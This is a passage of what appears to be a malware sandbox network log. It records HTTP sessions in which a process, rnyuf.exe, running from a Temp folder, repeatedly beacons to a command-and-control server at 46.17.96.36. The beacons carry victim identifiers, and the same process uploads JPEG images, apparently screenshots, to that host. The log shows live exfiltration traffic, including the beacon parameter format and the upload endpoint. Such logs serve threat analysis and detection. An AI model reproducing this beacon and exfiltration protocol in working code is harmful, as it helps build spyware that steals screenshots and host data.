                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:04.923625946 CEST18350INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:04 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        305192.168.2.45004446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:04.850858927 CEST18261OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:04.850938082 CEST18261OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:04.851093054 CEST18271OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:04.851170063 CEST18274OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:04.886976004 CEST18277OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:04.887034893 CEST18285OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:04.887059927 CEST18294OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:29:04.887082100 CEST18300OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:04.922856092 CEST18303OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:04.922928095 CEST18326OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:29:04.922996998 CEST18350OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:29:05.031271935 CEST18369INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0
                                        Aug 29, 2021 22:29:05.037400007 CEST18369OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:05.113878965 CEST18370INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        306192.168.2.45004546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:05.363693953 CEST18371OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:05.434000969 CEST18384INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        307192.168.2.45004646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:05.427823067 CEST18371OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:29:05.427963018 CEST18371OUTData Raw: 2d 2d 2d 2d 2d 2d 38 30 37 32 61 31 37 38 64 62 64 63 36 31 36 37 62 31 39 32 33 35 62 61 65 66 62 61 32 61 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------8072a178dbdc6167b19235baefba2abcContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:29:05.428064108 CEST18381OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:29:05.428138971 CEST18384OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:29:05.462709904 CEST18387OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:29:05.463027000 CEST18398OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:29:05.463052988 CEST18400OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:29:05.463463068 CEST18403OUTData Raw: b3 13 c9 24 f7 34 66 bb 23 b2 4c e4 95 9b 6d 0e f2 d4 f7 a4 31 0f 5a 4e 69 72 6a b4 27 51 3c 9f 7a 3c 93 4b b8 d2 ef 34 59 0e f2 19 e5 35 21 42 2a 5f 33 da 9d e6 0f 4a 2c 85 76 56 c1 f4 a5 c7 b5 58 dc a7 b5 38 04 3d a8 e4 0e 72 a5 15 68 c6 9d 8d
                                        Data Ascii: $4f#Lm1ZNirj'Q<z<K4Y5!B*_3J,vVX8=rh'Mjoy+dCKRy,)l;Qf;SNYQE%(QKLAEPEJ(,!(bbQE)iZ){!i`Z))EIAKE-)j,(SR>Sii:@PE-B
                                        Aug 29, 2021 22:29:05.463489056 CEST18405OUTData Raw: 1f c3 56 c5 cb 8f 7a 91 6e bd 68 f6 70 7d 43 da 54 46 69 86 41 fc 26 9a 55 87 50 45 6b 7d a5 0f 55 14 be 64 2d d5 45 3f 63 17 b3 0f 6c fa a3 23 14 95 ae 52 dd bb 51 f6 4b 73 d3 8a 9f 62 fa 31 fb 75 d5 19 34 56 a9 d3 e3 3d 1a a3 3a 61 ec c2 97 b1
                                        Data Ascii: Vznhp}CTFiA&UPEk}Ud-E?cl#RQKsb1u4V=:a{hx4e0KIt)TUijco"2;\KFKJp1J2n%-4!ih%8RSP(.($Zp*Si,ZQIJ*--%8SD;H.(&LShG.(>P!FmsG(s
                                        Aug 29, 2021 22:29:05.463525057 CEST18410OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:29:05.498511076 CEST18413OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:29:05.603530884 CEST18479INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        308192.168.2.45004746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:05.621556044 CEST18480OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:05.707417011 CEST18480INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:05 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        309192.168.2.45004846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:06.120485067 CEST18481OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:29:06.206125021 CEST18571INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:29:06 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        31192.168.2.44976646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:24.236601114 CEST4366OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:24.236721992 CEST4366OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:24.236958981 CEST4376OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:24.237090111 CEST4379OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:24.269013882 CEST4390OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:24.269076109 CEST4399OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:24.269099951 CEST4404OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:24.301376104 CEST4423OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:24.301445007 CEST4431OUTData Raw: 50 67 ce f8 cd 30 83 9e 6b e8 e5 f0 d6 88 07 fc 82 ed 7f ef 8a f3 3f 89 9a 7d 9d 95 cd 97 d9 2d a2 83 72 36 e1 18 c6 79 aa 85 5e 77 60 92 e5 3c 8e 93 14 99 a5 15 c6 7a 07 a6 fc 0d e3 c6 b7 bf f6 0e 7f fd 19 1d 7b ad f3 e2 df 1f de 60 3f af f4 af
                                        Data Ascii: Pg0k?}-r6y^w`<z{`?t}fA4;;;]> x!GVP)F{0T]Il;j|~)k%o1)qIJ+,)i3@4uR)<:s^Q_YH;x~^S
                                        Aug 29, 2021 22:27:24.301564932 CEST4441OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:24.301887035 CEST4454OUTData Raw: 8b 23 4b 57 3f bb 91 1b e8 e0 d3 0e 93 27 a3 81 ea 56 98 10 9e d5 66 18 6e 38 d8 5d 7e 87 15 0d ce 3d 4a 8c 94 b6 45 53 a5 cd fc 3b 4f d4 e2 98 da 65 d0 ff 00 96 4c 7d c5 6f c1 0d e1 c6 66 63 ec 79 ad 6b 68 2e 4e 32 a8 df 55 ac 27 8b 94 0e da 58
                                        Data Ascii: #KW?'Vfn8]~=JES;OeL}ofcykh.N2U'XgS&3nk<=b}0`htvG'=$&MbS*:fk s4*eA~"5b)Y#sC$:Xl,|Ju6t?;5dUgO
                                        Aug 29, 2021 22:27:24.415349960 CEST4473INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        310192.168.2.45004946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:29:06.120948076 CEST18481OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----8072a178dbdc6167b19235baefba2abc
                                        Host: 46.17.96.36
                                        Content-Length: 107132
                                        Cache-Control: no-cache
